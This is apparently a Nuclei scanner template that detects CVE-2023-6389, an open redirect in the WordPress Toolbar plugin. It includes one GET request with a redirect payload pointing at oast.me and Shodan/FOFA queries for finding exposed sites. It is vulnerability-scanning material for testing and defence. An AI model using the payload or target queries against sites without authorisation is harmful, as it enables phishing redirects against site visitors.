id: CVE-2023-6389

info:
  name: WordPress Toolbar <= 2.2.6 - Open Redirect
  author: Kazgangap
  severity: medium
  description: |
    The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  reference:
    - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6389
    cwe-id: CWE-601
    epss-score: 0.00097
    epss-percentile: 0.40297
    cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
  metadata:
    verified: true
    max-request: 1
    vendor: abhinavsingh
    product: wordpress_toolbar
    shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/
    fofa-query: body=/wp-content/plugins/wordpress-toolbar/
    publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a00473045022100c02ded482859448a1bda812ee6638f116a12421d8fc431859d42761ca5c38dd3022015c86130724ca43cce6b7cd93aeea90fa3d03cc9a0cd16569cb4603bdfb530b8:922c64590222798bb761d5b6d8e72950